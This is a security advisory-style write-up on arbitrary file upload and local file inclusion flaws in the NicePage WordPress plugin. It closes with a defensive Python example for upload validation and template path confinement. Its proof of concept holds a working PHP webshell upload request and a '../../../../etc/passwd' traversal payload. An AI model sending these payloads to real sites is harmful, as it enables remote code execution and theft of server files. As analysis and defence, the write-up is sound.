Nicepage Vulnerability
Security Write-Up: Vulnerabilities in NicePage Website Builder

1. Executive Summary

NicePage is a popular website builder and content management system (CMS) used for creating websites via a desktop application, WordPress plugin, or Joomla extension. Security researchers and automated scanners have identified several vulnerabilities in the NicePage ecosystem, primarily affecting the WordPress plugin. The most critical issues are Arbitrary File Upload and Authenticated Local File Inclusion (LFI), which allow attackers with low-level privileges (such as subscribers) to execute malicious code on the server and take control of the website.

2. Affected Versions

Software: NicePage (WordPress Plugin)
Affected Versions: Generally versions prior to 2.3.9 (for the specific LFI vulnerabilities) and various versions with respect to the file upload logic. (Note: vendor patches are released regularly, but the architecture has historically allowed these vectors.)
Severity: High to Critical (CVSS 7.5 - 9.8 depending on configuration).
3. Technical Vulnerability Details

A. Arbitrary File Upload (Unrestricted Upload)

The most prominent vulnerability in NicePage stems from improper validation of file types during the upload process.

Vulnerability Vector: The plugin registers AJAX actions to handle file uploads for site assets (images, videos, etc.). Because older versions lack capability checks or verify the nonce improperly, the AJAX endpoint may be reachable by lower-privileged users.

Technical Analysis:
Endpoint: The plugin listens for wp_ajax_nopriv_nicepage_upload or similar hooks.
Validation Flaw: The application relies on client-side validation or insufficient server-side MIME type verification. It often fails to strictly whitelist allowed extensions (e.g., only .jpg and .png).

Exploitation:
An attacker crafts a malicious payload containing a webshell (e.g., shell.php). The attacker sends a POST request to the wp-admin/admin-ajax.php endpoint with the action parameter set to the NicePage upload handler. If the file is saved to a publicly accessible directory (typically wp-content/uploads/nicepage/), the attacker can navigate to the file in the browser. This results in Remote Code Execution (RCE).

Proof of Concept (Conceptual):

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="action"

nicepage_upload_file
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="exploit.php"
Content-Type: application/x-php

<?php system($_GET['cmd']); ?>
------WebKitFormBoundary--
B. Local File Inclusion (LFI)

In specific versions of NicePage, the application fails to sanitize user input when including template files or handling theme layouts.

Technical Analysis:
Source: User input is passed via GET or POST parameters (e.g., page, template, or file).
Sink: The application passes the tainted input to a PHP function such as include(), include_once(), or require() without proper path traversal sanitization.

Exploitation:
An attacker manipulates the input to traverse directories (e.g., ../../../../etc/passwd), which allows them to read sensitive files on the server. In advanced scenarios, if the attacker can upload a malicious image containing PHP code (via the upload vulnerability above), they can use the LFI to execute that code (LFI to RCE).
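The server-side checks whose absence sections A and B describe, as an added example (not NicePage's code): the upload validator applies an extension allowlist plus a file-signature check so a webshell is refused whether or not it is renamed to an image, and the template resolver confines user input to the template directory before it can reach an include() sink. Function names, directory paths and sample payloads are constructed for the illustration.

```python
from __future__ import annotations
from pathlib import Path

# Allowlist: extension -> file signature (magic bytes) a real file of that type starts with.
# Anything not in the table is rejected, so a .php upload never reaches the uploads directory.
ALLOWED_ASSET_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}

def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for an uploaded asset.
    Only the last extension counts (shell.php.png is judged as .png), the content must
    carry that type's signature, and PHP open tags hidden in image data are refused so
    an "image" cannot later be executed through an include() sink."""
    suffix = Path(filename).suffix.lower()
    if suffix not in ALLOWED_ASSET_TYPES:
        return False, f"extension {suffix!r} not in allowlist"
    if not data.startswith(ALLOWED_ASSET_TYPES[suffix]):
        return False, "content does not match declared image type"
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded PHP marker in image data"
    return True, "ok"

def resolve_template(base_dir: str, requested: str) -> str | None:
    """Confine a user-supplied template name to base_dir before it is included.
    resolve() collapses ../ sequences and discards the base when the request is
    absolute, so both traversal forms fail the containment check below."""
    base = Path(base_dir).resolve()
    candidate = (base / requested).resolve()
    if candidate == base or not candidate.is_relative_to(base):
        return None                      # escaped the directory (or named it)
    if candidate.suffix.lower() != ".html":
        return None                      # templates are static HTML only
    return str(candidate)

if __name__ == "__main__":
    # Constructed samples: a direct .php upload, a PHP payload disguised as .png, a real PNG.
    php_stub = b"<?php echo 'constructed test payload'; ?>"
    samples = [("exploit.php", php_stub), ("shell.png", php_stub),
               ("logo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)]
    for name, body in samples:
        print(f"{name:12} -> {validate_upload(name, body)}")
    templates = "/var/www/html/wp-content/nicepage/templates"   # constructed path
    for req in ("home.html", "../../../../etc/passwd", "/etc/passwd"):
        print(f"{req:24} -> {resolve_template(templates, req)}")
```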